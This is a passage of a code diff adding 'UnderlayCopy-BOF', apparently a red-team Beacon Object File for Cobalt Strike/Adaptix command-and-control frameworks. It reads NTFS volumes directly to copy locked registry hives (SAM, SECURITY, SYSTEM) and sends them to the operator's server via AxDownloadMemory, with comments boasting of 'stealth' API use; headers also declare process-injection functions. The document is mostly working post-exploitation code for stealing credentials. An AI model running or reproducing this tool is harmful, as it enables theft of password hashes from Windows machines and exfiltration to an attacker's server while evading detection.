+    MSVCRT$memset(buffer, 0, bufferSize);
+    intFree(buffer);
+    
+    // Verify that we copied the complete file
+    if (bytesWritten != fileSize) {
+        return FALSE;
+    }
+    
+    return TRUE;
+}
+
+// Copy file by extents directly to memory buffer (for download to server)
+BOOL CopyFileByMftToMemory(HANDLE hVolume, FILE_INFO* fileInfo, NTFS_BOOT* boot, BYTE** outputBuffer, ULONGLONG* outputSize) {
+    ULONGLONG bytesCopied = 0;
+    BYTE* buffer = NULL;
+    DWORD bufferSize = 64 * 1024; // 64KB buffer
+    IO_STATUS_BLOCK ioStatus;
+    NTSTATUS status;
+    BYTE* resultBuffer = NULL;
+
+    *outputBuffer = NULL;
+    *outputSize = 0;
+
+    // Allocate output buffer
+    if (fileInfo->fileSize > 0x7FFFFFFF) {
+        BeaconPrintf(CALLBACK_ERROR, "[-] File too large: %llu bytes\n", fileInfo->fileSize);
+        return FALSE; // File too large
+    }
+    resultBuffer = (BYTE*)intAlloc((SIZE_T)fileInfo->fileSize);
+    if (!resultBuffer) {
+        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate buffer for file (%llu bytes)\n", fileInfo->fileSize);
+        return FALSE;
+    }
+
+    buffer = (BYTE*)intAlloc(bufferSize);
+    if (!buffer) {
+        intFree(resultBuffer);
+        return FALSE;
+    }
+
+    if (fileInfo->isResident) {
+        // Copy resident data directly
+        if (fileInfo->residentData && fileInfo->residentDataSize > 0) {
+            MSVCRT$memcpy(resultBuffer, fileInfo->residentData, fileInfo->residentDataSize);
+            bytesCopied = fileInfo->residentDataSize;
+        } else {
+            intFree(resultBuffer);
+            intFree(buffer);
+            return FALSE;
+        }
+    } else if (fileInfo->hasRuns && fileInfo->runCount > 0) {
+        // Copy non-resident data
+        int i;
+        for (i = 0; i < fileInfo->runCount; i++) {
+            ULONGLONG toRead = fileInfo->runs[i].length * boot->clusterSize;
+            ULONGLONG remaining = fileInfo->fileSize - bytesCopied;
+            if (toRead > remaining) {
+                toRead = remaining;
+            }
+            if (toRead == 0) {
+                break;
+            }
+
+            if (fileInfo->runs[i].lcn == 0) {
+                // Sparse cluster - write zeros
+                WriteSparseToMemory(resultBuffer, bytesCopied, toRead);
+                bytesCopied += toRead;
+                continue;
+            }
+
+            ULONGLONG diskOffset = fileInfo->runs[i].lcn * boot->clusterSize;
+            ULONGLONG copied = 0;
+            
+            if (!CopyChunkToMemory(hVolume, resultBuffer, bytesCopied, diskOffset, toRead, buffer, bufferSize, &copied)) {
+                // If we've copied some data and reached file size, it's OK
+                if (bytesCopied >= fileInfo->fileSize) {
+                    break;
+                }
+                intFree(resultBuffer);
+                intFree(buffer);
+                return FALSE;
+            }
+            
+            bytesCopied += copied;
+
+            if (bytesCopied >= fileInfo->fileSize) {
+                break;
+            }
+        }
+    } else {
+        // File has no data runs and is not resident - empty file or error
+        if (fileInfo->fileSize == 0) {
+            // Empty file is valid
+            bytesCopied = 0;
+        } else {
+            // Error: file has size but no data
+            BeaconPrintf(CALLBACK_ERROR, "[-] File has size (%llu) but no data (not resident, no runs)\n", fileInfo->fileSize);
+            intFree(resultBuffer);
+            intFree(buffer);
+            return FALSE;
+        }
+    }
+
+    // Clear buffer before freeing
+    MSVCRT$memset(buffer, 0, bufferSize);
+    intFree(buffer);
+
+    // Verify that we copied the complete file
+    if (bytesCopied != fileInfo->fileSize) {
+        intFree(resultBuffer);
+        return FALSE;
+    }
+    
+    *outputBuffer = resultBuffer;
+    *outputSize = bytesCopied;
+    return TRUE;
+}
+
+// Download file to server using Adaptix API
+// Format: HOSTNAME_FILENAME.hive
+BOOL download_file(IN LPCSTR sourcePath, IN LPCSTR customFileName, IN char* fileData, IN ULONG32 fileLength) {
+    if (!fileData || fileLength == 0) {
+        return FALSE;
+    }
+    
+    // Get hostname
+    DWORD hostnameSize = MAX_COMPUTERNAME_LENGTH + 1;
+    char* hostname = (char*)intAlloc(hostnameSize);
+    if (!hostname) {
+        return FALSE;
+    }
+    
+    if (!KERNEL32$GetComputerNameA(hostname, &hostnameSize)) {
+        intFree(hostname);
+        return FALSE;
+    }
+    
+    // Extract filename from source path or use custom filename
+    char* fileName = NULL;
+    BOOL needFreeFileName = FALSE;
+    
+    if (customFileName && MSVCRT$strlen(customFileName) > 0) {
+        // Extract filename from custom path (e.g., ".\SAM2" -> "SAM2")
+        char* lastSlash = MSVCRT$strrchr(customFileName, '\\');
+        if (!lastSlash) {
+            lastSlash = MSVCRT$strrchr(customFileName, '/');
+        }
+        
+        const char* fileNamePtr = lastSlash ? (lastSlash + 1) : customFileName;
+        int fileNameLen = MSVCRT$strlen(fileNamePtr) + 1;
+        fileName = (char*)intAlloc(fileNameLen);
+        if (!fileName) {
+            intFree(hostname);
+            return FALSE;
+        }
+        MSVCRT$strcpy(fileName, fileNamePtr);
+        needFreeFileName = TRUE;
+    } else if (sourcePath) {
+        // Extract filename from source path
+        char* lastSlash = MSVCRT$strrchr(sourcePath, '\\');
+        if (!lastSlash) {
+            lastSlash = MSVCRT$strrchr(sourcePath, '/');
+        }
+        
+        const char* fileNamePtr = lastSlash ? (lastSlash + 1) : sourcePath;
+        int fileNameLen = MSVCRT$strlen(fileNamePtr) + 1;
+        fileName = (char*)intAlloc(fileNameLen);
+        if (!fileName) {
+            intFree(hostname);
+            return FALSE;
+        }
+        MSVCRT$strcpy(fileName, fileNamePtr);
+        needFreeFileName = TRUE;
+    } else {
+        intFree(hostname);
+        return FALSE;
+    }
+    
+    // Remove extension from filename if present
+    char* fileExt = MSVCRT$strrchr(fileName, '.');
+    int baseNameLen = fileExt ? (fileExt - fileName) : MSVCRT$strlen(fileName);
+    
+    // Allocate buffer for final filename: HOSTNAME_FILENAME.hive
+    int finalNameLen = hostnameSize + baseNameLen + 6; // +6 for "_" and ".hive\0"
+    char* finalFileName = (char*)intAlloc(finalNameLen);
+    if (!finalFileName) {
+        if (needFreeFileName) {
+            intFree(fileName);
+        }
+        intFree(hostname);
+        return FALSE;
+    }
+    
+    // Build filename: HOSTNAME_FILENAME.hive
+    MSVCRT$sprintf(finalFileName, "%.*s_%.*s.hive", 
+        (int)hostnameSize, hostname,
+        baseNameLen, fileName);
+    
+    // Download to server
+    AxDownloadMemory(finalFileName, fileData, (int)fileLength);
+    BeaconPrintf(CALLBACK_OUTPUT, "[+] File downloaded to server: %s (%lu bytes)\n", finalFileName, fileLength);
+    
+    // Cleanup
+    intFree(finalFileName);
+    if (needFreeFileName) {
+        intFree(fileName);
+    }
+    intFree(hostname);
+    
+    return TRUE;
+}
+
+// Main function
+void go(char* args, int len) {
+    datap parser;
+    char* mode = NULL;
+    char* sourceFile = NULL;
+    char* destFile = NULL;
+    int downloadToServer = 0;  // 0 = write to disk, 1 = download to server
+    WCHAR* sourceFileW = NULL;
+    WCHAR* destFileW = NULL;
+    HANDLE hVolume = INVALID_HANDLE_VALUE;
+    HANDLE hOutput = INVALID_HANDLE_VALUE;
+    NTFS_BOOT boot = {0};
+    FILE_INFO fileInfo = {0};
+    BYTE* mftRecord = NULL;
+    ULONGLONG mftRecordNumber = 0;
+    ULONGLONG fileSize = 0;
+    BOOL success = FALSE;
+    BYTE* fileBuffer = NULL;  // Buffer for file data when downloading to server
+
+    BeaconDataParse(&parser, args, len);
+    mode = BeaconDataExtract(&parser, NULL);
+    sourceFile = BeaconDataExtract(&parser, NULL);
+    destFile = BeaconDataExtract(&parser, NULL);
+    downloadToServer = BeaconDataInt(&parser);
+
+    if (!mode || !sourceFile) {
+        return;
+    }
+    
+    // Check if destFile is empty string (when --download is used without destination)
+    if (destFile && MSVCRT$strlen(destFile) == 0) {
+        destFile = NULL;
+    }
+    
+    // If downloading to server, destFile is optional (used as filename on server)
+    // If saving to disk, destFile is required
+    if (!downloadToServer && !destFile) {
+        return;
+    }
+
+    // Convert to wide char
+    int sourceLen = MSVCRT$strlen(sourceFile) + 1;
+    sourceFileW = (WCHAR*)intAlloc(sourceLen * sizeof(WCHAR));
+    KERNEL32$MultiByteToWideChar(CP_ACP, 0, sourceFile, -1, sourceFileW, sourceLen);
+    
+    if (destFile) {
+        int destLen = MSVCRT$strlen(destFile) + 1;
+        destFileW = (WCHAR*)intAlloc(destLen * sizeof(WCHAR));
+        KERNEL32$MultiByteToWideChar(CP_ACP, 0, destFile, -1, destFileW, destLen);
+    } else if (downloadToServer) {
+        // Generate default filename from source if not provided
+        char* fileName = MSVCRT$strrchr(sourceFile, '\\');
+        if (!fileName) {
+            fileName = MSVCRT$strrchr(sourceFile, '/');
+        }
+        if (fileName) {
+            fileName++;  // Skip the separator
+        } else {
+            fileName = sourceFile;
+        }
+        int destLen = MSVCRT$strlen(fileName) + 1;
+        destFileW = (WCHAR*)intAlloc(destLen * sizeof(WCHAR));
+        KERNEL32$MultiByteToWideChar(CP_ACP, 0, fileName, -1, destFileW, destLen);
+    }
+
+    // Open volume using NtCreateFile for stealth (hardcoded to C: for now)
+    OBJECT_ATTRIBUTES objAttr;
+    UNICODE_STRING volumePath;
+    IO_STATUS_BLOCK ioStatus;
+    NTSTATUS status;
+    
+    WCHAR volumeName[] = L"\\??\\C:";
+    NTDLL$RtlInitUnicodeString(&volumePath, volumeName);
+    
+    objAttr.Length = sizeof(OBJECT_ATTRIBUTES);
+    objAttr.RootDirectory = NULL;
+    objAttr.ObjectName = &volumePath;
+    objAttr.Attributes = OBJ_CASE_INSENSITIVE;
+    objAttr.SecurityDescriptor = NULL;
+    objAttr.SecurityQualityOfService = NULL;
+    
+    status = NTDLL$NtCreateFile(
+        &hVolume,
+        FILE_READ_DATA | SYNCHRONIZE,
+        &objAttr,
+        &ioStatus,
+        NULL,
+        FILE_ATTRIBUTE_NORMAL,
+        FILE_SHARE_READ | FILE_SHARE_WRITE,
+        FILE_OPEN,
+        FILE_SYNCHRONOUS_IO_NONALERT,
+        NULL,
+        0
+    );
+
+    if (!NT_SUCCESS(status)) {
+        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to open volume: 0x%08X\n", status);
+        goto cleanup;
+    }
+
+    // Read NTFS boot sector
+    if (!ReadNtfsBoot(hVolume, &boot)) {
+        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to read NTFS boot sector\n");
+        goto cleanup;
+    }
+
+    if (MSVCRT$strcmp(mode, "MFT") == 0) {
+        // MFT mode
+        if (!GetNtfsFileInfo(sourceFileW, &mftRecordNumber, &fileSize)) {
+            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get file info from source\n");
+            goto cleanup;
+        }
+
+        mftRecord = (BYTE*)intAlloc(MFT_RECORD_SIZE);
+        if (!mftRecord) {
+            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate MFT record buffer\n");
+            goto cleanup;
+        }
+
+        if (!ReadMftRecord(hVolume, &boot, mftRecordNumber, mftRecord)) {
+            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to read MFT record\n");
+            goto cleanup;
+        }
+
+        // Initialize fileSize before parsing (will be overwritten if $DATA found)
+        fileInfo.fileSize = fileSize;
+        
+        if (!GetFileInfoFromRecord(mftRecord, &fileInfo, &boot)) {
+            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to parse file info from MFT record\n");
+            goto cleanup;
+        }
+
+        // Use actual file size from GetNtfsFileInfo (more reliable)
+        fileInfo.fileSize = fileSize;
+        
+        if (downloadToServer) {
+            // Copy file directly to memory for download (no disk write)
+            ULONGLONG copiedSize = 0;
+            if (!CopyFileByMftToMemory(hVolume, &fileInfo, &boot, &fileBuffer, &copiedSize)) {
+                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to copy file data to memory\n");
+                goto cleanup;
+            }
+            
+            // Close output file handle (we don't need it anymore)
+            if (hOutput != INVALID_HANDLE_VALUE) {
+                NTDLL$NtClose(hOutput);
+                hOutput = INVALID_HANDLE_VALUE;
+            }
+            
+            // Download to server with format: HOSTNAME_FILENAME.hive
+            if (download_file(sourceFile, destFile, (char*)fileBuffer, (ULONG32)copiedSize)) {
+                success = TRUE;
+                BeaconPrintf(CALLBACK_OUTPUT, "[+] File copied and downloaded to server: %llu bytes\n", copiedSize);
+            } else {
+                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to download file to server\n");
+            }
+        } else {
+            // Create output file using NtCreateFile for stealth
+            if (!CreateOutputFileNt(destFileW, &hOutput)) {
+                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create output file\n");
+                goto cleanup;
+            }
+            
+            if (!CopyFileByMft(hVolume, hOutput, &fileInfo, &boot)) {
+                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to copy file data\n");
+                goto cleanup;
+            }
+
+            success = TRUE;
+            BeaconPrintf(CALLBACK_OUTPUT, "[+] File copied successfully: %llu bytes\n", fileSize);
+        }
+    } else if (MSVCRT$strcmp(mode, "Metadata") == 0) {
+        // Metadata mode - use FSCTL_GET_RETRIEVAL_POINTERS
+        HANDLE hSourceFile = INVALID_HANDLE_VALUE;
+        EXTENT* extents = NULL;
+        DWORD extentCount = 0;
+        
+        // Get file size
+        if (!GetNtfsFileInfo(sourceFileW, &mftRecordNumber, &fileSize)) {
+            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get file info from source\n");
+            goto cleanup;
+        }
+        
+        // Open source file for getting extents using CreateFileW (DeviceIoControl requires CreateFileW handle)
+        WCHAR normalizedSourcePath[MAX_PATH * 2];
+        
+        if (!NormalizePathForCreateFileW(sourceFileW, normalizedSourcePath, MAX_PATH * 2)) {
+            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to normalize source path\n");
+            goto cleanup;
+        }
+        
+        // Try with minimal access rights first (FSCTL_GET_RETRIEVAL_POINTERS may work with just FILE_READ_ATTRIBUTES)
+        // For locked files like SAM, SECURITY, SYSTEM, we need FILE_FLAG_BACKUP_SEMANTICS
+        hSourceFile = KERNEL32$CreateFileW(
+            normalizedSourcePath,
+            FILE_READ_ATTRIBUTES,
+            FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
+            NULL,
+            OPEN_EXISTING,
+            FILE_FLAG_BACKUP_SEMANTICS,
+            NULL
+        );
+        
+        // If that fails, try with FILE_READ_DATA (but this usually fails for locked files)
+        if (hSourceFile == INVALID_HANDLE_VALUE) {
+            DWORD error1 = KERNEL32$GetLastError();
+            hSourceFile = KERNEL32$CreateFileW(
+                normalizedSourcePath,
+                FILE_READ_ATTRIBUTES | FILE_READ_DATA,
+                FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
+                NULL,
+                OPEN_EXISTING,
+                FILE_FLAG_BACKUP_SEMANTICS,
+                NULL
+            );
+            if (hSourceFile == INVALID_HANDLE_VALUE) {
+                // Both attempts failed - file is likely locked
+                DWORD error2 = KERNEL32$GetLastError();
+                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to open source file (locked?): first=0x%08X, second=0x%08X\n", error1, error2);
+                BeaconPrintf(CALLBACK_ERROR, "[-] Note: For locked files (SAM, SECURITY, SYSTEM), use MFT mode instead\n");
+                goto cleanup;
+            }
+        }
+        
+        if (hSourceFile == INVALID_HANDLE_VALUE) {
+            DWORD error = KERNEL32$GetLastError();
+            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to open source file: 0x%08X\n", error);
+            goto cleanup;
+        }
+        
+        // Get extents
+        if (GetFileExtents(hSourceFile, &extents, &extentCount) == 0) {
+            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get file extents\n");
+            KERNEL32$CloseHandle(hSourceFile);
+            goto cleanup;
+        }
+        
+        KERNEL32$CloseHandle(hSourceFile);
+        
+        if (downloadToServer) {
+            // Copy file directly to memory for download
+            ULONGLONG copiedSize = 0;
+            BYTE* tempBuffer = NULL;
+            
+            if (!CopyFileByExtentsToMemory(hVolume, extents, extentCount, boot.clusterSize, fileSize, &tempBuffer, &copiedSize)) {
+                intFree(extents);
+                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to copy file data to memory\n");
+                goto cleanup;
+            }
+            
+            // Download to server
+            if (download_file(sourceFile, destFile, (char*)tempBuffer, (ULONG32)copiedSize)) {
+                success = TRUE;
+                BeaconPrintf(CALLBACK_OUTPUT, "[+] File copied and downloaded to server: %llu bytes\n", copiedSize);
+            } else {
+                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to download file to server\n");
+            }
+            
+            intFree(tempBuffer);
+        } else {
+            // Create output file using NtCreateFile for stealth
+            if (!CreateOutputFileNt(destFileW, &hOutput)) {
+                intFree(extents);
+                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create output file\n");
+                goto cleanup;
+            }
+            
+            if (!CopyFileByExtents(hVolume, hOutput, extents, extentCount, boot.clusterSize, fileSize)) {
+                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to copy file data\n");
+                intFree(extents);
+                goto cleanup;
+            }
+            
+            success = TRUE;
+            BeaconPrintf(CALLBACK_OUTPUT, "[+] File copied successfully: %llu bytes\n", fileSize);
+        }
+        
+        if (extents) {
+            intFree(extents);
+        }
+    }
+
+cleanup:
+    // Clean up handles using NtClose for stealth
+    if (hVolume != INVALID_HANDLE_VALUE) {
+        NTDLL$NtClose(hVolume);
+    }
+    if (hOutput != INVALID_HANDLE_VALUE) {
+        NTDLL$NtClose(hOutput);
+    }
+    
+    // Securely clear and free memory
+    if (mftRecord) {
+        MSVCRT$memset(mftRecord, 0, MFT_RECORD_SIZE);
+        intFree(mftRecord);
+    }
+    if (fileInfo.runs) {
+        MSVCRT$memset(fileInfo.runs, 0, sizeof(DATA_RUN) * fileInfo.runCount);
+        intFree(fileInfo.runs);
+    }
+    if (fileInfo.residentData) {
+        MSVCRT$memset(fileInfo.residentData, 0, fileInfo.residentDataSize);
+        intFree(fileInfo.residentData);
+    }
+    if (sourceFileW) {
+        MSVCRT$memset(sourceFileW, 0, sourceLen * sizeof(WCHAR));
+        intFree(sourceFileW);
+    }
+    if (destFileW) {
+        int destLen = KERNEL32$lstrlenW(destFileW) + 1;
+        MSVCRT$memset(destFileW, 0, destLen * sizeof(WCHAR));
+        intFree(destFileW);
+    }
+    
+    if (fileBuffer) {
+        MSVCRT$memset(fileBuffer, 0, (SIZE_T)fileSize);
+        intFree(fileBuffer);
+    }
+    
+    // Clear sensitive data from stack
+    MSVCRT$memset(&boot, 0, sizeof(boot));
+    MSVCRT$memset(&fileInfo, 0, sizeof(fileInfo));
+}
+

--- a/Creds-BOF/UnderlayCopy-BOF/UnderlayCopyBOF/underlaycopy.h
+++ b/Creds-BOF/UnderlayCopy-BOF/UnderlayCopyBOF/underlaycopy.h
@@ -1,0 +1,128 @@
+#ifndef UNDERLAYCOPY_H
+#define UNDERLAYCOPY_H
+
+#include <windows.h>
+#include <stdint.h>
+
+// NTFS Constants
+#define MFT_RECORD_SIZE 1024
+// FILE_READ_ATTRIBUTES and FILE_FLAG_BACKUP_SEMANTICS are already defined in windows.h
+#define FILE_SHARE_READ 0x00000001
+#define FILE_SHARE_WRITE 0x00000002
+#define FILE_SHARE_DELETE 0x00000004
+#define OPEN_EXISTING 3
+
+// NTSTATUS helper
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
+#endif
+
+// NtCreateFile constants (if not defined)
+#ifndef FILE_READ_DATA
+#define FILE_READ_DATA 0x0001
+#endif
+#ifndef FILE_WRITE_DATA
+#define FILE_WRITE_DATA 0x0002
+#endif
+#ifndef FILE_OPEN
+#define FILE_OPEN 1
+#endif
+#ifndef FILE_OVERWRITE_IF
+#define FILE_OVERWRITE_IF 5
+#endif
+#ifndef FILE_SYNCHRONOUS_IO_NONALERT
+#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
+#endif
+#ifndef FILE_NON_DIRECTORY_FILE
+#define FILE_NON_DIRECTORY_FILE 0x00000040
+#endif
+#ifndef FILE_OPEN_FOR_BACKUP_INTENT
+#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000
+#endif
+#ifndef OBJ_CASE_INSENSITIVE
+#define OBJ_CASE_INSENSITIVE 0x00000040L
+#endif
+
+// NTFS Attribute Types
+#define ATTRIBUTE_END 0xFFFFFFFF
+#define ATTRIBUTE_FILE_NAME 0x30
+#define ATTRIBUTE_DATA 0x80
+
+// NTFS Boot Sector offsets
+#define BOOT_BYTES_PER_SECTOR 11
+#define BOOT_SECTORS_PER_CLUSTER 13
+#define BOOT_MFT_CLUSTER 48
+
+// Data Run structure
+typedef struct {
+    ULONGLONG lcn;
+    ULONGLONG length;
+} DATA_RUN;
+
+// Extent structure (for Metadata mode)
+typedef struct {
+    ULONGLONG lcn;
+    ULONGLONG lengthClusters;
+} EXTENT;
+
+// NTFS Boot Sector structure
+typedef struct {
+    WORD bytesPerSector;
+    BYTE sectorsPerCluster;
+    DWORD clusterSize;
+    ULONGLONG mftCluster;
+} NTFS_BOOT;
+
+// File Info structure
+typedef struct {
+    ULONGLONG fileSize;
+    ULONGLONG mftRecordNumber;
+    DATA_RUN* runs;
+    int runCount;
+    BOOL hasRuns;
+    BOOL isResident;
+    BYTE* residentData;
+    DWORD residentDataSize;
+} FILE_INFO;
+
+// Constants
+#ifndef MAX_COMPUTERNAME_LENGTH
+#define MAX_COMPUTERNAME_LENGTH 15
+#endif
+
+// FSCTL_GET_RETRIEVAL_POINTERS constants
+#ifndef FSCTL_GET_RETRIEVAL_POINTERS
+#define FSCTL_GET_RETRIEVAL_POINTERS 0x00090073
+#endif
+
+#ifndef ERROR_MORE_DATA
+#define ERROR_MORE_DATA 234
+#endif
+
+// Structures for FSCTL_GET_RETRIEVAL_POINTERS are defined in winioctl.h
+// STARTING_VCN_INPUT_BUFFER and RETRIEVAL_POINTERS_BUFFER are already defined there
+
+// Helper function declarations
+BOOL NormalizePathForCreateFileW(LPCWSTR path, WCHAR* normalizedPath, int bufferSize);
+BOOL NormalizePathForNtCreateFile(LPCWSTR path, WCHAR* normalizedPath, int bufferSize);
+BOOL CreateOutputFileNt(LPCWSTR destPath, HANDLE* hOutput);
+BOOL CopyFileByExtentsToMemory(HANDLE hVolume, EXTENT* extents, DWORD extentCount, ULONGLONG clusterSize, ULONGLONG fileSize, BYTE** outputBuffer, ULONGLONG* outputSize);
+
+// Common I/O functions
+BOOL WriteSparseToFile(HANDLE hOutput, ULONGLONG offset, ULONGLONG size, BYTE* tempBuffer);
+void WriteSparseToMemory(BYTE* destBuffer, ULONGLONG offset, ULONGLONG size);
+BOOL CopyChunkToFile(HANDLE hVolume, HANDLE hOutput, ULONGLONG diskOffset, ULONGLONG toCopy, ULONGLONG writeOffset, BYTE* buffer, DWORD bufferSize, ULONGLONG* bytesWritten);
+BOOL CopyChunkToMemory(HANDLE hVolume, BYTE* destBuffer, ULONGLONG destOffset, ULONGLONG diskOffset, ULONGLONG toCopy, BYTE* readBuffer, DWORD bufferSize, ULONGLONG* bytesCopied);
+
+// Function declarations
+BOOL ReadNtfsBoot(HANDLE hVolume, NTFS_BOOT* boot);
+BOOL GetNtfsFileInfo(LPCWSTR filePath, ULONGLONG* mftRecordNumber, ULONGLONG* fileSize);
+BOOL ReadMftRecord(HANDLE hVolume, NTFS_BOOT* boot, ULONGLONG recordNumber, BYTE* record);
+int ParseDataRuns(BYTE* dataRuns, int dataRunsSize, DATA_RUN** runs, NTFS_BOOT* boot);
+BOOL GetFileInfoFromRecord(BYTE* record, FILE_INFO* fileInfo, NTFS_BOOT* boot);
+BOOL CopyFileByMft(HANDLE hVolume, HANDLE hOutput, FILE_INFO* fileInfo, NTFS_BOOT* boot);
+int GetFileExtents(HANDLE hFile, EXTENT** extents, DWORD* extentCount);
+BOOL CopyFileByExtents(HANDLE hVolume, HANDLE hOutput, EXTENT* extents, DWORD extentCount, ULONGLONG clusterSize, ULONGLONG fileSize);
+
+#endif // UNDERLAYCOPY_H
+

--- a/Creds-BOF/UnderlayCopy-BOF/_include/adaptix.h
+++ b/Creds-BOF/UnderlayCopy-BOF/_include/adaptix.h
@@ -1,0 +1,7 @@
+#pragma once
+
+#include "beacon.h"
+
+DECLSPEC_IMPORT void AxAddScreenshot(char* note, char* data, int len);
+DECLSPEC_IMPORT void AxDownloadMemory(char* filename, char* data, int len);
+

--- a/Creds-BOF/UnderlayCopy-BOF/_include/beacon.h
+++ b/Creds-BOF/UnderlayCopy-BOF/_include/beacon.h
@@ -1,0 +1,66 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Cobalt Strike 4.1.
+ */
+
+/* data API */
+#pragma once
+
+#ifdef BOF
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_ERROR       0x0d
+#define CALLBACK_OUTPUT_UTF8 0x20
+
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);
+#endif
+

--- a/Creds-BOF/UnderlayCopy-BOF/_include/bofdefs.h
+++ b/Creds-BOF/UnderlayCopy-BOF/_include/bofdefs.h
@@ -1,0 +1,55 @@
+#pragma once
+#pragma intrinsic(memcmp, memcpy, strcpy, strcmp, _stricmp, strlen)
+#include <windows.h>
+#include <winternl.h>
+#include <stdio.h>
+
+//KERNEL32
+WINBASEAPI void * WINAPI KERNEL32$VirtualAlloc (LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
+WINBASEAPI int WINAPI KERNEL32$VirtualFree (LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
+WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
+WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
+WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID);
+WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID);
+WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject);
+WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileW (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
+WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA (LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
+WINBASEAPI DWORD WINAPI KERNEL32$GetFileSize (HANDLE hFile, LPDWORD lpFileSizeHigh);
+WINBASEAPI WINBOOL WINAPI KERNEL32$ReadFile (HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
+WINBASEAPI WINBOOL WINAPI KERNEL32$WriteFile (HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
+WINBASEAPI DWORD WINAPI KERNEL32$SetFilePointer (HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod);
+WINBASEAPI WINBOOL WINAPI KERNEL32$GetFileInformationByHandle (HANDLE hFile, LPBY_HANDLE_FILE_INFORMATION lpFileInformation);
+WINBASEAPI DWORD WINAPI KERNEL32$GetFullPathNameW (LPCWSTR lpFileName, DWORD nBufferLength, LPWSTR lpBuffer, LPWSTR *lpFilePart);
